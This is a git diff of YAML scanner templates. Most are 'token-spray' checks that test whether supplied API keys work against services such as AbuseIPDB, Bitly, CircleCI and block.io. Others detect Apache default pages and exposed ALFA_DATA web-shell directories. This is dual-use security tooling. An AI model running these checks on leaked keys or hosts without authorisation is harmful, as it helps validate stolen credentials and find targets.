Default Test Page author: dhiyaneshDk severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22Apache2+Debian+Default+Page%3A+It+works%22 + metadata: + max-request: 1 + shodan-query: http.title:"Apache2 Debian Default Page:" tags: tech,apache -requests: +http: - method: GET path: - '{{BaseURL}}' @@ -18,3 +19,5 @@ requests: words: - "Apache2 Debian Default Page: It works" part: body + +# digest: 490a00463044022068f196b95fc943781824e0eb9e8d05dc3b07394f47ad12d5f5e07ef4606ca0670220205cd739fda4afdbf9e5f3e941db9a05568effa277b7bdf6153112ed2d1fa918:922c64590222798bb761d5b6d8e72950 diff --git a/poc/apache/default-apache2-page-6806.yaml b/poc/apache/default-apache2-page-6806.yaml new file mode 100644 index 0000000000..2f32e210bc --- /dev/null +++ b/poc/apache/default-apache2-page-6806.yaml @@ -0,0 +1,20 @@ +id: default-apache2-page + +info: + name: Apache2 Default Test Page + author: dhiyaneshDk + severity: info + metadata: + shodan-query: http.title:"Apache2 Debian Default Page:" + tags: tech,apache + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + words: + - "Apache2 Debian Default Page: It works" + part: body diff --git a/poc/apache/default-apache2-ubuntu-page-6809.yaml b/poc/apache/default-apache2-ubuntu-page-6809.yaml index 6738fe2192..3efd0d3dea 100644 --- a/poc/apache/default-apache2-ubuntu-page-6809.yaml +++ b/poc/apache/default-apache2-ubuntu-page-6809.yaml @@ -1,17 +1,23 @@ id: default-apache2-ubuntu-page + info: name: Apache2 Ubuntu Default Page author: dhiyaneshDk severity: info metadata: + max-request: 1 shodan-query: http.title:"Apache2 Ubuntu Default Page" tags: tech,apache -requests: + +http: - method: GET path: - '{{BaseURL}}' + matchers: - type: word words: - "Apache2 Ubuntu Default Page: It works" part: body + +# digest: 4a0a00473045022100daed8690f24f8c0009d7167980aeee76223c786cfdcaf5b5c0e9ec6c830f5c240220648f0f8615f54d45ff1d6f251ef25e42441e1a12c23ee2a6864375e5fe44e494:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/alfacgiapi-wordpress-255.yaml b/poc/api/alfacgiapi-wordpress-255.yaml index d3b9faa070..69b0d39f88 100644 --- a/poc/api/alfacgiapi-wordpress-255.yaml +++ b/poc/api/alfacgiapi-wordpress-255.yaml @@ -1,33 +1,30 @@ -id: alfacgiapi-wordpress - -info: - name: alfacgiapi - author: pussycat0x - severity: low - description: Searches for sensitive directories present in the ALFA_DATA. - reference: https://www.exploit-db.com/ghdb/6999 - tags: wordpress,listing - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-includes/ALFA_DATA/" - - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/" - - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - type: word - words: - - "/wp-content/plugins/" - - "/wp-includes/ALFA_DATA/" - - "/ALFA_DATA/alfacgiapi/" - - "/cgi-bin/ALFA_DATA/alfacgiapi/" - condition: or - - type: status - status: - - 200 +id: alfacgiapi-wordpress +info: + name: alfacgiapi + author: pussycat0x + severity: low + description: Searches for sensitive directories present in the ALFA_DATA. + reference: https://www.exploit-db.com/ghdb/6999 + tags: wordpress,listing +requests: + - method: GET + path: + - "{{BaseURL}}/wp-includes/ALFA_DATA/" + - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/" + - "{{BaseURL}}/ALFA_DATA/alfacgiapi/" + - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/" + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - type: word + words: + - "/wp-content/plugins/" + - "/wp-includes/ALFA_DATA/" + - "/ALFA_DATA/alfacgiapi/" + - "/cgi-bin/ALFA_DATA/alfacgiapi/" + condition: or + - type: status + status: + - 200 diff --git a/poc/api/alfacgiapi-wordpress-257.yaml b/poc/api/alfacgiapi-wordpress-257.yaml index f8d61143d9..ea09ed84de 100644 --- a/poc/api/alfacgiapi-wordpress-257.yaml +++ b/poc/api/alfacgiapi-wordpress-257.yaml @@ -1,33 +1,30 @@ -id: alfacgiapi-wordpress - -info: - name: alfacgiapi - author: pussycat0x - severity: low - description: Searches for sensitive directories present in the ALFA_DATA. - reference: https://www.exploit-db.com/ghdb/6999 - tags: wordpress,listing - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-includes/ALFA_DATA/" - - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/" - - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - type: word - words: - - "/wp-content/plugins/" - - "/wp-includes/ALFA_DATA/" - - "/ALFA_DATA/alfacgiapi/" - - "/cgi-bin/ALFA_DATA/alfacgiapi/" - condition: or - - type: status - status: - - 200 +id: alfacgiapi-wordpress +info: + name: alfacgiapi + author: pussycat0x + severity: low + description: Searches for sensitive directories present in the ALFA_DATA. + reference: https://www.exploit-db.com/ghdb/6999 + tags: wordpress,listing +requests: + - method: GET + path: + - "{{BaseURL}}/wp-includes/ALFA_DATA/" + - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/" + - "{{BaseURL}}/ALFA_DATA/alfacgiapi/" + - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/" + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - type: word + words: + - "/wp-content/plugins/" + - "/wp-includes/ALFA_DATA/" + - "/ALFA_DATA/alfacgiapi/" + - "/cgi-bin/ALFA_DATA/alfacgiapi/" + condition: or + - type: status + status: + - 200 diff --git a/poc/api/api-abuseipdb-384.yaml b/poc/api/api-abuseipdb-384.yaml index 29bfe0170f..077084fa93 100644 --- a/poc/api/api-abuseipdb-384.yaml +++ b/poc/api/api-abuseipdb-384.yaml @@ -1,24 +1,16 @@ id: api-abuseipdb info: - name: AbuseIPDB API - Test + name: AbuseIPDB API Test author: daffainfo severity: info - description: AbuseIPDB API test was conducted. reference: - https://docs.abuseipdb.com/ - - https://github.com/daffainfo/all-about-apikey/tree/main/abuseipdb - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 1 + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/AbuseIPDB.md tags: token-spray,abuseipdb self-contained: true - -http: +requests: - raw: - | POST https://api.abuseipdb.com/api/v2/report HTTP/1.1 @@ -37,5 +29,3 @@ http: - 'data":' - 'ipAddress":' condition: and - -# digest: 4a0a00473045022026c2d562a4f7dc93f0e27e3a45a21c8baad795377bcfeb24e6204a9243b63112022100ed4cabe0abae1bdaa6674449f8e3cdbc1eebeb4b6e7a3f4ced7b85f7288324bd:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-abuseipdb-385.yaml b/poc/api/api-abuseipdb-385.yaml deleted file mode 100644 index 077084fa93..0000000000 --- a/poc/api/api-abuseipdb-385.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: api-abuseipdb - -info: - name: AbuseIPDB API Test - author: daffainfo - severity: info - reference: - - https://docs.abuseipdb.com/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/AbuseIPDB.md - tags: token-spray,abuseipdb - -self-contained: true -requests: - - raw: - - | - POST https://api.abuseipdb.com/api/v2/report HTTP/1.1 - Host: api.abuseipdb.com - Key: {{token}} - Accept: application/json - Content-Type: application/x-www-form-urlencoded - Content-Length: 16 - - ip=127.0.0.1&categories=18,22&comment=SSH%20login%20attempts%20with%20user%20root. - - matchers: - - type: word - part: body - words: - - 'data":' - - 'ipAddress":' - condition: and diff --git a/poc/api/api-accuweather-386.yaml b/poc/api/api-accuweather-386.yaml new file mode 100644 index 0000000000..0bc6282dc2 --- /dev/null +++ b/poc/api/api-accuweather-386.yaml @@ -0,0 +1,29 @@ +id: api-accuweather + +info: + name: AccuWeather API Test + author: zzeitlin + severity: info + reference: + - https://developer.accuweather.com/apis + metadata: + max-request: 1 + tags: token-spray,accuweather + +self-contained: true + +http: + - method: GET + path: + - "http://api.accuweather.com/locations/v1/search?language=en-US&apikey={{token}}&q=Athens,%20Greece" + + matchers: + - type: word + part: body + words: + - '"Version"' + - '"LocalizedName"' + - '"DataSets"' + condition: and + +# digest: 4b0a00483046022100d00f2152465c3858fe0b7b03fc3e88fbac6b919525f6c0b1c028a09a0ded9c48022100a0781fe50668fe64cea809f8616d799bd7d6b219e9e1bc4dbb2522f5e33b40df:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-accuweather.yaml b/poc/api/api-accuweather.yaml deleted file mode 100644 index 8c1c526443..0000000000 --- a/poc/api/api-accuweather.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: api-accuweather - -info: - name: AccuWeather API Test - author: zzeitlin - severity: info - reference: https://developer.accuweather.com/apis - tags: token-spray,accuweather - -self-contained: true -requests: - - method: GET - path: - - "http://api.accuweather.com/locations/v1/search?language=en-US&apikey={{token}}&q=Athens,%20Greece" - - matchers: - - type: word - part: body - words: - - '"Version"' - - '"LocalizedName"' - - '"DataSets"' - condition: and diff --git a/poc/api/api-adafruit-io-387.yaml b/poc/api/api-adafruit-io-387.yaml new file mode 100644 index 0000000000..87985ad5a3 --- /dev/null +++ b/poc/api/api-adafruit-io-387.yaml @@ -0,0 +1,30 @@ +id: api-adafruit-io + +info: + name: Adafruit IO API Test + author: dwisiswant0 + severity: info + reference: + - https://io.adafruit.com/api/docs/ + metadata: + max-request: 1 + tags: token-spray,adafruit + +self-contained: true + +http: + - method: GET + path: + - "https://io.adafruit.com/api/v2/user" + + headers: + X-AIO-Key: "{{token}}" + matchers: + - type: word + part: body + words: + - '"username":' + - '"id":' + condition: and + +# digest: 4a0a00473045022100bd2cde5742fc5e144ec6165cbc4dac66a0c51f4c574e845586f7ad8a47b196cb02206243f827c0ea95f3c051255499e838a938ac1a03275a636a90746a583327cd9e:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-adafruit-io.yaml b/poc/api/api-adafruit-io.yaml deleted file mode 100644 index 5fc0e8d40c..0000000000 --- a/poc/api/api-adafruit-io.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: api-adafruit-io - -info: - name: Adafruit IO API Test - author: dwisiswant0 - severity: info - reference: https://io.adafruit.com/api/docs/ - tags: token-spray,adafruit - -self-contained: true -requests: - - method: GET - path: - - "https://io.adafruit.com/api/v2/user" - headers: - X-AIO-Key: "{{token}}" - - matchers: - - type: word - part: body - words: - - '"username":' - - '"id":' - condition: and \ No newline at end of file diff --git a/poc/api/api-alienvault-388.yaml b/poc/api/api-alienvault-388.yaml index d0e5ba33ae..11968b6017 100644 --- a/poc/api/api-alienvault-388.yaml +++ b/poc/api/api-alienvault-388.yaml @@ -4,13 +4,17 @@ info: name: AlienVault Open Threat Exchange (OTX) API Test author: daffainfo severity: info + description: IP/domain/URL reputation reference: - https://otx.alienvault.com/api - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AlienVault%20Open%20Threat%20Exchange.md + - https://github.com/daffainfo/all-about-apikey/tree/main/alienvault-open-threat-exchange + metadata: + max-request: 1 tags: token-spray,alienvault,exchange self-contained: true -requests: + +http: - raw: - | GET https://otx.alienvault.com/api/v1/pulses/subscribed?page=1 HTTP/1.1 @@ -24,3 +28,5 @@ requests: - '"$schema":' - '"properties":' condition: and + +# digest: 4b0a00483046022100cfb8a99e6ad24ec70c2e69bf9d67d642aef36f843015c70845938d97ff80c96a022100a44d8300cbd0db289a5e51a128ecd43ae20a9d4960a6632ab18ca6bcbb0192e7:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-alienvault-389.yaml b/poc/api/api-alienvault-389.yaml index 11968b6017..254c5be20d 100644 --- a/poc/api/api-alienvault-389.yaml +++ b/poc/api/api-alienvault-389.yaml @@ -4,17 +4,13 @@ info: name: AlienVault Open Threat Exchange (OTX) API Test author: daffainfo severity: info - description: IP/domain/URL reputation reference: - https://otx.alienvault.com/api - - https://github.com/daffainfo/all-about-apikey/tree/main/alienvault-open-threat-exchange - metadata: - max-request: 1 + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/AlienVault%20Open%20Threat%20Exchange.md tags: token-spray,alienvault,exchange self-contained: true - -http: +requests: - raw: - | GET https://otx.alienvault.com/api/v1/pulses/subscribed?page=1 HTTP/1.1 @@ -28,5 +24,3 @@ http: - '"$schema":' - '"properties":' condition: and - -# digest: 4b0a00483046022100cfb8a99e6ad24ec70c2e69bf9d67d642aef36f843015c70845938d97ff80c96a022100a44d8300cbd0db289a5e51a128ecd43ae20a9d4960a6632ab18ca6bcbb0192e7:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-appveyor-392.yaml b/poc/api/api-appveyor-392.yaml new file mode 100644 index 0000000000..d868abd588 --- /dev/null +++ b/poc/api/api-appveyor-392.yaml @@ -0,0 +1,31 @@ +id: api-appveyor + +info: + name: AppVeyor API Test + author: dwisiswant0 + severity: info + reference: + - https://www.appveyor.com/docs/api/ + metadata: + max-request: 1 + tags: token-spray,appveyor + +self-contained: true + +http: + - method: GET + path: + - "https://ci.appveyor.com/api/roles" + + headers: + Content-Type: application/json + Authorization: Bearer {{token}} + matchers: + - type: word + part: body + words: + - '"roleId":' + - '"created":' + condition: and + +# digest: 490a00463044022015e6f1f344553fca9c4d1692f24a0f16dfd25d843ca49e5e964b62de347863e9022059f1676f4a19b82033665201e9ba232546dc2321a3469bad64e04a80191e5af2:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-appveyor.yaml b/poc/api/api-appveyor.yaml deleted file mode 100644 index 25bac0e370..0000000000 --- a/poc/api/api-appveyor.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: api-appveyor - -info: - name: AppVeyor API Test - author: dwisiswant0 - severity: info - reference: https://www.appveyor.com/docs/api/ - tags: token-spray,appveyor - -self-contained: true -requests: - - method: GET - path: - - "https://ci.appveyor.com/api/roles" - headers: - Content-Type: application/json - Authorization: Bearer {{token}} - - matchers: - - type: word - part: body - words: - - '"roleId":' - - '"created":' - condition: and \ No newline at end of file diff --git a/poc/api/api-asana-393.yaml b/poc/api/api-asana-393.yaml deleted file mode 100644 index 9608f3c236..0000000000 --- a/poc/api/api-asana-393.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: api-asana - -info: - name: Asana API Test - author: zzeitlin - reference: https://developers.asana.com/docs/using-terminal - severity: info - tags: token-spray,asana - -self-contained: true -requests: - - method: GET - path: - - "https://app.asana.com/api/1.0/users/me" - headers: - Authorization: Bearer {{token}} - - matchers: - - type: word - part: body - words: - - 'data:' - - 'email' - - 'name' - condition: and diff --git a/poc/api/api-asana.yaml b/poc/api/api-asana.yaml index 9282cf7a4d..9608f3c236 100644 --- a/poc/api/api-asana.yaml +++ b/poc/api/api-asana.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,asana +self-contained: true requests: - method: GET path: @@ -15,7 +16,10 @@ requests: Authorization: Bearer {{token}} matchers: - - type: status - status: - - 401 - negative: true + - type: word + part: body + words: + - 'data:' + - 'email' + - 'name' + condition: and diff --git a/poc/api/api-bingmaps.yaml b/poc/api/api-bingmaps-395.yaml similarity index 100% rename from poc/api/api-bingmaps.yaml rename to poc/api/api-bingmaps-395.yaml diff --git a/poc/api/api-bitly-396.yaml b/poc/api/api-bitly-396.yaml deleted file mode 100644 index 0a4c307e15..0000000000 --- a/poc/api/api-bitly-396.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: api-bitly - -info: - name: Bitly API Test - author: zzeitlin - reference: https://dev.bitly.com/api-reference - severity: info - tags: token-spray,bitly - -self-contained: true -requests: - - method: GET - path: - - "https://api-ssl.bitly.com/v3/shorten?access_token={{token}}&longUrl=https://www.google.com" - - matchers: - - type: word - part: body - words: - - '"long_url":' - - '"created_at":' - condition: and \ No newline at end of file diff --git a/poc/api/api-bitly.yaml b/poc/api/api-bitly.yaml index 57e1d5d3d4..0a4c307e15 100644 --- a/poc/api/api-bitly.yaml +++ b/poc/api/api-bitly.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,bitly +self-contained: true requests: - method: GET path: @@ -15,6 +16,7 @@ requests: matchers: - type: word part: body - negative: true words: - - 'INVALID_ARG_ACCESS_TOKEN' + - '"long_url":' + - '"created_at":' + condition: and \ No newline at end of file diff --git a/poc/api/api-bitrise-397.yaml b/poc/api/api-bitrise-397.yaml deleted file mode 100644 index 96ca399331..0000000000 --- a/poc/api/api-bitrise-397.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: api-bitrise - -info: - name: Bitrise API Test - author: daffainfo - severity: info - description: Build tool and processes integrations to create efficient development pipelines - reference: - - https://api-docs.bitrise.io/ - - https://github.com/daffainfo/all-about-apikey/tree/main/bitrise - metadata: - max-request: 1 - tags: token-spray,bitrise - -self-contained: true - -http: - - raw: - - | - GET https://api.bitrise.io/v0.1/me HTTP/1.1 - Host: api.bitrise.io - Authorization: {{token}} - - matchers: - - type: word - part: body - words: - - '"username":' - - '"slug":' - - '"email":' - condition: and - -# digest: 4a0a0047304502203371c051bd3399996cc566f5864a6e016a56f383c0ced061c17e85d1117ab252022100d976865824087f7c211f9213a1452a87ad07e2b5aae257c8872a9e00ddd7bdda:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-bitrise.yaml b/poc/api/api-bitrise.yaml new file mode 100644 index 0000000000..2d05c3282d --- /dev/null +++ b/poc/api/api-bitrise.yaml @@ -0,0 +1,28 @@ +id: api-bitrise + +info: + name: Bitrise API Test + author: daffainfo + severity: info + description: Build tool and processes integrations to create efficient development pipelines + reference: + - https://api-docs.bitrise.io/ + - https://github.com/daffainfo/all-about-apikey/tree/main/bitrise + tags: token-spray,bitrise + +self-contained: true +requests: + - raw: + - | + GET https://api.bitrise.io/v0.1/me HTTP/1.1 + Host: api.bitrise.io + Authorization: {{token}} + + matchers: + - type: word + part: body + words: + - '"username":' + - '"slug":' + - '"email":' + condition: and diff --git a/poc/api/api-block-400.yaml b/poc/api/api-block-400.yaml new file mode 100644 index 0000000000..2fc7dfe928 --- /dev/null +++ b/poc/api/api-block-400.yaml @@ -0,0 +1,31 @@ +id: api-block + +info: + name: block.io API Test + author: daffainfo + severity: info + description: Bitcoin Payment, Wallet & Transaction Data + reference: + - https://block.io/docs/basic + - https://github.com/daffainfo/all-about-apikey/tree/main/block + metadata: + max-request: 1 + tags: token-spray,block + +self-contained: true + +http: + - method: GET + path: + - "https://block.io/api/v2/get_balance/?api_key={{token}}" + + matchers: + - type: word + part: body + words: + - '"network"' + - '"available_balance"' + - '"pending_received_balance"' + condition: and + +# digest: 4b0a00483046022100fd81e0c16388146cbd2b450d6118a86ae188f23abff1b84fd08cdafc4d7638b1022100ba0a85f74493861f7ddbeb5e5f11a6ffc1a597ffc5da016918e2f8dcb099110c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-block.yaml b/poc/api/api-block.yaml deleted file mode 100644 index 616a67dd9f..0000000000 --- a/poc/api/api-block.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: api-block - -info: - name: block.io API Test - author: daffainfo - severity: info - description: Bitcoin Payment, Wallet & Transaction Data - reference: - - https://block.io/docs/basic - - https://github.com/daffainfo/all-about-apikey/tree/main/block - tags: token-spray,block - -self-contained: true -requests: - - method: GET - path: - - "https://block.io/api/v2/get_balance/?api_key={{token}}" - - matchers: - - type: word - part: body - words: - - '"network"' - - '"available_balance"' - - '"pending_received_balance"' - condition: and diff --git a/poc/api/api-blockchain.yaml b/poc/api/api-blockchain-398.yaml similarity index 100% rename from poc/api/api-blockchain.yaml rename to poc/api/api-blockchain-398.yaml diff --git a/poc/api/api-blockchain-399.yaml b/poc/api/api-blockchain-399.yaml index afa9207f6c..edcb10fe49 100644 --- a/poc/api/api-blockchain-399.yaml +++ b/poc/api/api-blockchain-399.yaml @@ -4,17 +4,19 @@ info: name: Blockchain API Test author: daffainfo severity: info + description: Bitcoin Payment, Wallet & Transaction Data reference: - https://api.blockchain.com/v3/#/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Blockchain.md - tags: token-spray,blockchain + - https://github.com/daffainfo/all-about-apikey/tree/main/blockchain classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 + metadata: + max-request: 1 + tags: token-spray,blockchain self-contained: true -requests: + +http: - raw: - | GET https://api.blockchain.com/v3/exchange/accounts HTTP/1.1 @@ -30,4 +32,4 @@ requests: - '"available"' condition: and -# Enhanced by cs on 2022/02/28 +# digest: 490a0046304402201940dafe64505005b67796f616913ec59074288c8967f03a60c1b267796561790220030733f886ac2542be7e2e64e7c9914c450737c940edac691b2a764a03bde3b2:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-buildkite-402.yaml b/poc/api/api-buildkite.yaml similarity index 100% rename from poc/api/api-buildkite-402.yaml rename to poc/api/api-buildkite.yaml diff --git a/poc/api/api-buttercms-403.yaml b/poc/api/api-buttercms-403.yaml index 21b6d1dff1..13e2bf6449 100644 --- a/poc/api/api-buttercms-403.yaml +++ b/poc/api/api-buttercms-403.yaml @@ -3,12 +3,16 @@ id: api-buttercms info: name: ButterCMS API Test author: zzeitlin - reference: https://buttercms.com/docs/api/#introduction severity: info + reference: + - https://buttercms.com/docs/api/#introduction + metadata: + max-request: 1 tags: token-spray,buttercms self-contained: true -requests: + +http: - method: GET path: - "https://api.buttercms.com/v2/posts/?auth_token={{token}}" @@ -20,4 +24,6 @@ requests: - '"meta":' - '"data":' - '"url":' - condition: and \ No newline at end of file + condition: and + +# digest: 4a0a0047304502204dc8c9796e535808254d0eb5626dc45c1b06b31a8bf085440a59efa7dfdf7abc022100e54314942e38c520cc860c0fdb63002f2bb74bca1f4ff487cbc2d9c6e5a0e6a0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-circleci-405.yaml b/poc/api/api-circleci-405.yaml index cfe7672786..281d22b656 100644 --- a/poc/api/api-circleci-405.yaml +++ b/poc/api/api-circleci-405.yaml @@ -7,16 +7,12 @@ info: severity: info tags: token-spray,circle,circleci -self-contained: true requests: - method: GET path: - "https://circleci.com/api/v1.1/me?circle-token={{token}}" matchers: - - type: word - part: body - words: - - '"admin"' - - '"login"' - condition: and + - type: status + status: + - 200 diff --git a/poc/api/api-circleci-406.yaml b/poc/api/api-circleci-406.yaml index 2dbc5d1fd8..b01e427381 100644 --- a/poc/api/api-circleci-406.yaml +++ b/poc/api/api-circleci-406.yaml @@ -3,16 +3,12 @@ id: api-circleci info: name: CircleCI API Test author: zzeitlin + reference: https://circleci.com/docs/api/v1 severity: info - reference: - - https://circleci.com/docs/api/v1 - metadata: - max-request: 1 tags: token-spray,circleci self-contained: true - -http: +requests: - method: GET path: - "https://circleci.com/api/v1.1/me?circle-token={{token}}" @@ -24,5 +20,3 @@ http: - '"admin"' - '"login"' condition: and - -# digest: 4b0a00483046022100befa69c8084387c43f1df5df2a5b9cacb42b1ad4d09c75933ba3db370ad2697b022100b6229895dd79e1bdbdd69a91b78d59b9227e543ee8df3bf385460c9ab095b9d0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-coinapi-408.yaml b/poc/api/api-coinapi-408.yaml deleted file mode 100644 index f4285dd83b..0000000000 --- a/poc/api/api-coinapi-408.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: api-coinapi - -info: - name: CoinAPI API Test - author: daffainfo - severity: info - description: All Currency Exchanges integrate under a single api - reference: - - https://docs.coinapi.io/ - - https://github.com/daffainfo/all-about-apikey/tree/main/coinapi - metadata: - max-request: 1 - tags: token-spray,coinapi - -self-contained: true - -http: - - raw: - - | - GET https://rest.coinapi.io/v1/exchanges HTTP/1.1 - Host: rest.coinapi.io - X-CoinAPI-Key: {{token}} - - matchers: - - type: word - part: body - words: - - '"exchange_id":' - - '"website":' - - '"name":' - condition: and - -# digest: 4b0a00483046022100a574100efec77cf185d51fc83943f788217c9e1ad8e7a40c0180da3559fb1bb9022100fc3450c1ba3a0494de47b64ec3f0d6da00d95a293b5d7a8f1f804c6668a9d31a:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-coinapi.yaml b/poc/api/api-coinapi.yaml new file mode 100644 index 0000000000..e4a2e44374 --- /dev/null +++ b/poc/api/api-coinapi.yaml @@ -0,0 +1,28 @@ +id: api-coinapi + +info: + name: CoinAPI API Test + author: daffainfo + severity: info + description: All Currency Exchanges integrate under a single api + reference: + - https://docs.coinapi.io/ + - https://github.com/daffainfo/all-about-apikey/tree/main/coinapi + tags: token-spray,coinapi + +self-contained: true +requests: + - raw: + - | + GET https://rest.coinapi.io/v1/exchanges HTTP/1.1 + Host: rest.coinapi.io + X-CoinAPI-Key: {{token}} + + matchers: + - type: word + part: body + words: + - '"exchange_id":' + - '"website":' + - '"name":' + condition: and diff --git a/poc/api/api-cooperhewitt-409.yaml b/poc/api/api-cooperhewitt-409.yaml new file mode 100644 index 0000000000..0da30b58ee --- /dev/null +++ b/poc/api/api-cooperhewitt-409.yaml @@ -0,0 +1,25 @@ +id: api-cooperhewitt + +info: + name: Cooper Hewitt API + author: daffainfo + severity: info + reference: + - https://collection.cooperhewitt.org/api/methods/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Cooper%20Hewitt.md + tags: token-spray,cooperhewitt + +self-contained: true +requests: + - method: GET + path: + - "https://api.collection.cooperhewitt.org/rest/?method=api.spec.formats&access_token={{token}}" + + matchers: + - type: word + part: body + words: + - '"stat":' + - '"formats":' + - '"default_format":' + condition: and diff --git a/poc/api/api-cooperhewitt-410.yaml b/poc/api/api-cooperhewitt-410.yaml index 6835214dfc..d87a58b327 100644 --- a/poc/api/api-cooperhewitt-410.yaml +++ b/poc/api/api-cooperhewitt-410.yaml @@ -4,13 +4,17 @@ info: name: Cooper Hewitt API author: daffainfo severity: info + description: Smithsonian Design Museum reference: - https://collection.cooperhewitt.org/api/methods/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Art%20Design/Cooper%20Hewitt.md + - https://github.com/daffainfo/all-about-apikey/tree/main/cooper-hewitt + metadata: + max-request: 1 tags: token-spray,cooperhewitt self-contained: true -requests: + +http: - method: GET path: - "https://api.collection.cooperhewitt.org/rest/?method=api.spec.formats&access_token={{token}}" @@ -23,3 +27,5 @@ requests: - '"formats":' - '"default_format":' condition: and + +# digest: 4a0a00473045022100a87556e1aa966f9ea65e586971ad651a52304f66fa81672e1e9c71ff0e7ab6760220070d5d0cb80302cd2752145928b61272ad9443169f9ec996fd8124627c3bc140:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-cooperhewitt-411.yaml b/poc/api/api-cooperhewitt-411.yaml index 0da30b58ee..c54d64e093 100644 --- a/poc/api/api-cooperhewitt-411.yaml +++ b/poc/api/api-cooperhewitt-411.yaml @@ -16,10 +16,6 @@ requests: - "https://api.collection.cooperhewitt.org/rest/?method=api.spec.formats&access_token={{token}}" matchers: - - type: word - part: body - words: - - '"stat":' - - '"formats":' - - '"default_format":' - condition: and + - type: status + status: + - 200 diff --git a/poc/api/api-dbt-413.yaml b/poc/api/api-dbt-413.yaml new file mode 100644 index 0000000000..ac2aff6e83 --- /dev/null +++ b/poc/api/api-dbt-413.yaml @@ -0,0 +1,37 @@ +id: api-dbt + +info: + name: dbt Cloud API - Test + author: dwisiswant0 + severity: info + description: dbt Cloud API test was conducted. + reference: + - https://docs.getdbt.com/docs/introduction + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: token-spray,dbt + +self-contained: true + +http: + - method: GET + path: + - "https://cloud.getdbt.com/api/v2/accounts/" + + headers: + Content-Type: application/json + Authorization: Token {{token}} + matchers: + - type: word + part: body + words: + - "Invalid token" + - "Authentication credentials were not provided." + condition: or + negative: true + +# digest: 4b0a00483046022100c6d9d46a6748067d30d5eac61baf84db06bdd5d2c20f81eebe45d88632c24436022100b6acad72a60126e38544bc5e1ec88a391fbc36c314ae3ef933ed1d4ef2c39a6a:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-dbt.yaml b/poc/api/api-dbt.yaml deleted file mode 100644 index 8d19b5b055..0000000000 --- a/poc/api/api-dbt.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: api-dbt - -info: - name: dbt Cloud API Test - author: dwisiswant0 - severity: info - reference: https://docs.getdbt.com/docs/introduction - tags: token-spray,dbt - -self-contained: true -requests: - - method: GET - path: - - "https://cloud.getdbt.com/api/v2/accounts/" - headers: - Content-Type: application/json - Authorization: Token {{token}} - - matchers: - - type: word - part: body - words: - - "Invalid token" - - "Authentication credentials were not provided." - condition: or - negative: true diff --git a/poc/api/api-deviantart-415.yaml b/poc/api/api-deviantart-415.yaml deleted file mode 100644 index 999f0421e1..0000000000 --- a/poc/api/api-deviantart-415.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: api-deviantart - -info: - name: DeviantArt API Test - author: zzeitlin - severity: info - reference: - - https://www.deviantart.com/developers/authentication - metadata: - max-request: 1 - tags: token-spray,deviantart - -self-contained: true - -http: - - method: POST - path: - - "https://www.deviantart.com/api/v1/oauth2/placebo" - - body: "access_token={{token}}" - matchers: - - type: word - part: body - words: - - '"status" : "success"' - -# digest: 